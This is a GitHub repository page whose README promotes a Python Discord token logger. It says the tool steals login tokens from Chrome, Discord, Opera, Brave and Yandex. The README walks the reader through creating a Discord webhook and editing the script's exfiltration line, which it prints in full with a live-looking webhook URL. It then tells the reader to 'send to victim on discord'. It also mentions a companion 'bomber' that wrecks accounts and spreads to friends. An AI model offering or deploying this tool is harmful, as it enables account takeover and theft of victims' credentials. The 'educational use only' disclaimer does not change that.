Skip to content

omtoi101/discord-token-logger-python

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 

Repository files navigation

To run this you need to have python installed on your computer.

To download it go to: https://www.python.org/downloads/ and get the latest stable version.

feel free to run this on your computer to test it out as it will cause no damage and just send your info to your server as aposed to the bomber witch will nuke your discord and send itself to everyone on your friends list

This python script when you run it will token log the person

information it reurns: Screenshot 2021-05-09 145846

It token logs from

Chrome

Discord

Discord PTB

Discord Canary

Opera

Brave

Yandex

instuctions

If you want to change were it sends the token to.

  1. create a discord server

Screenshot 2021-05-09 150939

  1. add a webhook Screenshot 2021-05-09 150105

  2. copy webhook url Screenshot 2021-05-09 150143

  3. open the token_logger.py in IDLE or another python editor Screenshot 2021-05-09 150211

  4. scroll down to the last line before the blank (big gap in code) near the bottom were it says try: urlopen(Request("https://discord.com/api/webhooks/842670576677814292/x6AJt5CcuKtDX4JzZpPxztOsOXYHs0NFWv2i6ASDiw37AusGXgo9fT2GaJBCIAGQn8fE", data=dumps(webhook).encode(), headers=getheaders())) Screenshot 2021-05-09 150239

  5. change the "https://discord.com/api/webhooks/842670576677814292/x6AJt5CcuKtDX4JzZpPxztOsOXYHs0NFWv2i6ASDiw37AusGXgo9fT2GaJBCIAGQn8fE" to your webhook url Screenshot 2021-05-09 150300

  6. save the file Screenshot 2021-05-09 151713

  7. send to victim on discord Screenshot 2021-05-09 145846

!!Disclaimer this is for educational use only and i am not responsible for your actions or uses of this code!!

feel free to ask any questions or report any issues in the issues tab

About

python discord logger

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages